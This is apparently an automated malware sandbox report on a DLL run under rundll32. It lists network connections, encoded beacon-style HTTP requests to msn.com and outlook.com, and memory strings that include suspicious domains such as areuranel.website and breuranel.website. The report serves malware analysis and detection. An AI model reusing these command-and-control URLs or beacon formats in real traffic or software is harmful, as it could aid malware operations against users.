                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.223.66 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.124.210 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.137.114 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox ViewIP Address: 40.97.161.50 40.97.161.50
                      Source: Joe Sandbox ViewIP Address: 13.82.28.61 13.82.28.61
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtdN4v/UdHW73hHNRRgj93MpeR/gAwjHz21J0PRcDvLd3I609/yvRpibRLzjrjt/tNfBhMKC/cc7JRbI6tVdqBgZvAlBLjz4/UmIafwR6sLy9/c9juhd.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/M47eTWImwyNJIXk/bvBUnXDqSGJkSqnZ1W/IoQdQ6MHW/B7zE09Qn2ChgYQ2HLYH_/2FQQUDoZM2fDLMcKw_2/FKAo20C9iE_2FlWT_2Bfzo/Rp1YRopF97I_2/B8CxFQdR/_2BNrlSUvWcd0EwvOdX03BY/sLHqBgEIoN/l5xSyCjNwonJQFrna/xuhuk7iqStO6/LAN01N_2FT3/qYrzxcmDBjbOke/xPgut5GCh0/QPq7LLa.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/MnijqTPatYoqwLU2Gjp/CUGc0n_2BeItdu5kr8poMa/AhSBnyUxBLy2z/WL6kh9Er/V_2FntCaBAYN2Q0pmQz73pS/plPX31iyVH/sliN48qRh7bzwYOXL/_2Bf1goPp5sf/LxXLhBSZnu3/MQi2YcecwkM/9zZah40u0/3pu.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/ytBZeomNqV/HSfS_2F75u1_2Bgzu/fw3T9nUGqtyA/MnMc49Ew1bU/TR75BNg3t5wK_2/FZ_2BhHpRHjaoiOWsJCdm/IP7BzqL3kfOIwEpd/0v6vAk1XTaQKS4Q/4t76RFSHOBJGuOI3un/dPzfZGf9x/VMluKaNPNp_2BEHsWys0/7w8R7Qn2JCyyYRXwFiA/UZytNi_2F_2BVoKUDorTiy/Fo.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 65c8d4ee-587b-c9b1-e6a8-2fcf099847ceStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedBETarget: AM6PR04MB5622.EURPRD04.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: 7tTIZXtYscnmqC/PCZhHzg.1X-Powered-By: ASP.NETX-FEServer: AS8PR04CA0145Date: Mon, 11 Oct 2021 20:36:54 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 4b4aee2f-6f98-79c7-950f-5c79da77b3feStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedBETarget: AM6PR06MB4263.eurprd06.prod.outlook.comX-BackEndHttpStatus: 404X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: L+5KS5hvx3mVD1x52nez/g.1X-Powered-By: ASP.NETX-FEServer: AS9PR06CA0128Date: Mon, 11 Oct 2021 20:36:58 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 85b7812e-0a7c-b961-2cc4-adf543fab5aeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: VI1PR08CU010.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: VI1PR08CA0134.EURPRD08.PROD.OUTLOOK.COMX-CalculatedBETarget: VI1PR06MB5455.EURPRD06.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: LoG3hXwKYbksxK31Q/q1rg.1.1X-FEServer: VI1PR08CA0134X-Powered-By: ASP.NETX-FEServer: AS9PR06CA0260Date: Mon, 11 Oct 2021 20:38:17 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 295ac203-bc6e-2f15-84bf-9c5b1de6eb11Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: AM9P193CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: AM9P193CA0023.EURP193.PROD.OUTLOOK.COMX-CalculatedBETarget: AM0PR05MB4915.eurprd05.prod.outlook.comX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: A8JaKW68FS+Ev5xbHebrEQ.1.1X-FEServer: AM9P193CA0023X-Powered-By: ASP.NETX-FEServer: AS9PR05CA0054Date: Mon, 11 Oct 2021 20:38:20 GMTConnection: close
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000002.500798053.0000000004D65000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.503518309.00000000053C2000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.518255520.0000000005005000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484636695.0000000001174000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.656930982.00000000008FF000.00000004.00000001.sdmpString found in binary or memory: http://ogp.me/ns#
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484636695.0000000001174000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.656930982.00000000008FF000.00000004.00000001.sdmpString found in binary or memory: http://ogp.me/ns/fb#
                      Source: rundll32.exe, 00000003.00000003.611937576.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://areuranel.website/
                      Source: rundll32.exe, 00000003.00000003.611937576.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://areuranel.website/liopolo/gPZADesC/LIHFYPg1nfeS6qR4dfr58Og/poTvfxxfV9/7jcxdAxrxlBGvHHC2/KE8j
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmpString found in binary or memory: https://blogs.msn.com/
                      Source: rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://breuranel.website/8
                      Source: rundll32.exe, 00000003.00000003.743394786.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://breuranel.website/X
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmpString found in binary or memory: https://breuranel.website/liopolo/Gu5CX9rKtqJTGdubC/vfDJzFOCWocD/fyvnSBIy2J4/FhQlzlOfNqSLAT/n_2BCGU5
                      Source: rundll32.exe, 00000003.00000003.743394786.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://breuranel.website/liopolo/VQCuXOMQ58gaep/wQcyE3XNRkOUslXiuIoRn/thqxftgA7_2FvfGU/paR5aKKlYUJw
                      Source: rundll32.exe, 00000003.00000003.521631224.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://breuranel.website/liopolo/oPGaMFzTwbyZJ3jE/9_2B3jdhd0kGHjG/n_2BHWHpJci47et543/_2B6aHUxi/oZM9
                      Source: rundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.511056929.00000000008E9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478009497.00000000008E8000.00000004.00000001.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: rundll32.exe, 00000003.00000003.478075992.00000000008ED000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/logi
                      Source: loaddll32.exe, 00000000.00000003.484571941.0000000001166000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ch
                      Source: rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633984572&rver
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484484416.0000000001176000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633984576&rver
                      Source: rundll32.exe, 00000003.00000003.656930982.00000000008FF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.657034849.0000000004C3B000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633984656&rver
                      Source: loaddll32.exe, 00000000.00000003.663941944.000000000359B000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.663859168.000000000117A000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633984659&rver
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484484416.0000000001176000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.663914997.000000000359C000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.663859168.000000000117A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.657010952.0000000004C3C000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.656854025.0000000000900000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.477941064.00000000008F0000.00000004.00000001.sdmpString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=en-us"
                      Source: rundll32.exe, 00000003.00000003.511182314.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/
                      Source: loaddll32.exe, 00000000.00000002.768580069.00000000010C7000.00000004.00000020.sdmpString found in binary or memory: https://msn.com/e
                      Source: loaddll32.exe, 00000000.00000003.663884041.0000000001176000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/f
                      Source: rundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/Mnijq
                      Source: rundll32.exe, 00000003.00000003.511136188.0000000000889000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/U
                      Source: loaddll32.exe, 00000000.00000003.571505520.000000000112A000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com/
                      Source: loaddll32.exe, 00000000.00000003.571184163.000000000110E000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfS
                      Source: loaddll32.exe, 00000000.00000002.769550335.0000000001102000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/
                      Source: rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/$
                      Source: rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/;
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/C
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/Q
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/m
                      Source: rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.567344794.00000000008EA000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert
                      Source: loaddll32.exe, 00000000.00000003.576353780.0000000001176000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/w
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.752826654.000000000110E000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz
                      Source: rundll32.exe, 00000003.00000003.745980774.00000000008FF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.773684613.0000000000894000.00000004.00000020.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MW
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484484416.0000000001176000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.663941944.000000000359B000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484571941.0000000001166000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.663859168.000000000117A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.656930982.00000000008FF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478075992.00000000008ED000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.657034849.0000000004C3B000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch"
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.663914997.000000000359C000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.657010952.0000000004C3C000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.663914997.000000000359C000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.700067622.0000000000889000.00000004.00000001.sdmpString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
                      Source: rundll32.exe, 00000003.00000003.511182314.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/
                      Source: rundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/&
                      Source: rundll32.exe, 00000003.00000003.657010952.0000000004C3C000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fBqQVObz8g5lnocL%2frDmP1N8TTzvhY7vp6N%2fRS6H6xMUu%2fq
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fM47eTWImwyNJIXk%2fbvBUnXDqSGJkSqnZ1W%2fIoQdQ6MHW%2fB
                      Source: rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fwy2L0fN2E5PVQV%2fdJuGUeMmesCePLL0l7Wgt%2fWGkNYevXDY_
                      Source: loaddll32.exe, 00000000.00000003.663914997.000000000359C000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fytBZeomNqV%2fHSfS_2F75u1_2Bgzu%2ffw3T9nUGqtyA%2fMnMc
